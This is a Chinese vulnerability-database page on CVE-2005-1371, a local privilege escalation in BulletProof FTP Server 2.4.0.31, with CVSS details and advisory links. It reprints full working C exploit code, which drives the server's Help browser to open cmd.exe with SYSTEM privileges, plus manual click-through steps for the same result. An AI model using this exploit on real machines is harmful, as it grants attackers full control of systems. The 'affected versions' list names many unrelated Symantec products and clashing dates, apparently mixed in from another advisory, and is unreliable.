CVE-2005-1371
CVSS7.2
发布时间 :2005-05-03 00:00:00
修订时间 :2016-10-17 23:19:24
NMCOES    

[原文]BPFTPServer service in BulletProof FTP Server 2.4.0.31 does not properly drop privileges before opening files through the Help menu, which allows local users to gain privileges.


[CNNVD]BulletProof FTP Server本地提权漏洞(CNNVD-200505-884)

        BulletProof FTP Server 2.4.0.31中的BPFTPServer服务在通过帮助菜单打开文件之前未正确地收回权限,本地用户可借此获取权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1371
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1371
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-884
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111464474828477&w=2
(UNKNOWN)  BUGTRAQ  20050427 Privilege escalation in BulletProof FTP Server v2.4.0.31
http://www.securityfocus.com/bid/13410
(UNKNOWN)  BID  13410
http://www.vupen.com/english/advisories/2005/0419
(UNKNOWN)  VUPEN  ADV-2005-0419
http://xforce.iss.net/xforce/xfdb/20301
(UNKNOWN)  XF  bpftp-gain-privilege(20301)

- 漏洞信息

BulletProof FTP Server本地提权漏洞
高危 设计错误
2005-05-03 00:00:00 2006-09-05 00:00:00
本地  
        BulletProof FTP Server 2.4.0.31中的BPFTPServer服务在通过帮助菜单打开文件之前未正确地收回权限,本地用户可借此获取权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (971)

BulletProof FTP Server 2.4.0.31 Local Privilege Escalation Exploit (EDBID:971)
windows local
2005-04-29 Verified
0 Jerome Athias
[点击下载] [点击下载]
//******************************************************************************
//Privilege escalation in BulletProof FTP Server v2.4.0.31
//By Jerome Athias
//jerome DOT athias AT free DOT fr
//Discovered by Reed Arvin reedarvin[at]gmail[dot]com
//(http://reedarvin.thearvins.com)
//
//Little PoC
//Gives you a shell with system privileges
//******************************************************************************

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
char sText[]="%windir%\\system32\\cmd.exe";
char buffer[256];

lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31");
if (!lHandle)
{
       printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n");
       return 0;
}
else
{
       printf("handle for BulletProof : 0x%X\n",lHandle);
}
SetForegroundWindow(lHandle);

SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!"
Sleep(5000);   //I need this time to drink a beer ;P

//Find the browser Handle
//lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox");
//if (!lHandle2)
//{
       lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer");
       lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL);

       printf("handle for IE : 0x%X\n",lHandle2);
       if (!lHandle2)
       {
               printf("\nError while finding the browser's window.\n");
       }
//}
//else
//{
//        printf("handle for Firefox : 0x%X\n",lHandle2);
//}
SetForegroundWindow(lHandle2);

lHandle=FindWindowEx(lHandle2, 0, "WorkerW", 0);
if (lHandle>=0)
{
       lHandle = FindWindowEx(lHandle, 0, "ReBarWindow32", 0);
       if (lHandle>=0)
       {
               //Where are you Charlie...
             lHandle = FindWindowEx(lHandle, 0, "ComboBoxEx32", 0);
             lHandle = FindWindowEx(lHandle, 0, "ComboBox", 0);
             lHandle = FindWindowEx(lHandle, 0, "Edit", 0);
       }
}
else
{
       printf("\nerror :-(\n");
}

SendMessage(lHandle, WM_SETFOCUS, 0, 0);
Sleep(300);
SendMessage(lHandle, WM_SETTEXT, 0, (LPARAM) sText);
//Shatter!
PostMessage(lHandle, WM_KEYDOWN, VK_RETURN, 0);
//whoami? :-)

return 0;
}

// milw0rm.com [2005-04-29]
		

- 漏洞信息

15898
BulletProof FTP Server System Tray Icon Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

BulletProof FTP Server contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the BPFTPServer service is installed and running as SYSTEM, it is possible for a local attacker to manipulate the administrative interface and escalate privileges to that of the SYSTEM account. This flaw may lead to a loss of integrity.

- 时间线

2005-04-27 Unknow
2005-04-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

BulletProof FTP Server Local Privilege Escalation Vulnerability
Design Error 13410
No Yes
2004-12-13 12:00:00 2009-07-12 02:06:00
Discovery is credited to Reed Arvin <reedarvin@gmail.com>.

- 受影响的程序版本

Symantec Norton SystemWorks 2004
Symantec Norton SystemWorks 2003
Symantec Norton SystemWorks 2002
Symantec Norton SystemWorks 2001
Symantec Norton Internet Security 2004 Professional Edition
Symantec Norton Internet Security 2004
Symantec Norton Internet Security 2003 Professional Edition
Symantec Norton Internet Security 2003
Symantec Norton Internet Security 2002 Professional Edition 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton Internet Security 2002 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton Internet Security 2001 Professional Edition
Symantec Norton Internet Security 2001 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2004 Professional Edition
Symantec Norton AntiVirus 2004
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton Antivirus 2003 0
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2002 Professional Edition
Symantec Norton AntiVirus 2002 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2001 Professional Edition
Symantec Norton AntiVirus 2001 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98 b
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 3.5.1 SP5
- Microsoft Windows NT 3.5.1 SP3
- Microsoft Windows NT 3.5.1 SP2
- Microsoft Windows NT 3.5.1 SP1
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Symantec LiveUpdate 2.0
Symantec LiveUpdate 1.80.19 .0
Symantec LiveUpdate 1.9
Symantec LiveUpdate 1.8
Symantec LiveUpdate 1.7
+ Symantec Norton AntiVirus 2001 0
+ Symantec Norton AntiVirus 2002 0
+ Symantec Norton AntiVirus Corporate Edition 7.6
Symantec LiveUpdate 1.6
+ Symantec Norton AntiVirus 2001 0
+ Symantec Norton AntiVirus 2002 0
+ Symantec Norton AntiVirus Corporate Edition 7.51
+ Symantec Norton AntiVirus Corporate Edition 7.5
Symantec LiveUpdate 1.5
+ Symantec Norton AntiVirus 2001 0
Symantec LiveUpdate 1.4
+ Symantec Norton AntiVirus 5.0
Symantec AntiVirus for Handhelds Corporate Edition 3.0
Symantec AntiVirus for Handhelds 3.0
BulletProof FTP BulletProof FTP 2.4.0.31
Symantec LiveUpdate 2.5
Symantec Java LiveUpdate

- 不受影响的程序版本

Symantec LiveUpdate 2.5
Symantec Java LiveUpdate

- 漏洞讨论

BulletProof FTP Server is prone to a local privilege escalation vulnerability. This issue can allow a local unprivileged attacker to gain administrative privileges on a vulnerable computer.

A local attacker may influence the BulletProof FTP Server GUI configuration functionality in a manner that grants them elevated privileges.

This issue affects BulletProof FTP Server version 2.4.0.31.

- 漏洞利用

No exploit is required. The following steps are available:
1. Right click the BulletProof FTP Server tray icon and click Show Server.
2. Click the Help icon.
3. Internet Explorer will open (running under the context of the
LocalSystem account). Click File, Click Open.
4. Click Browse.
5. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.

Jerome Athias has provided exploit code for this vunerability.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站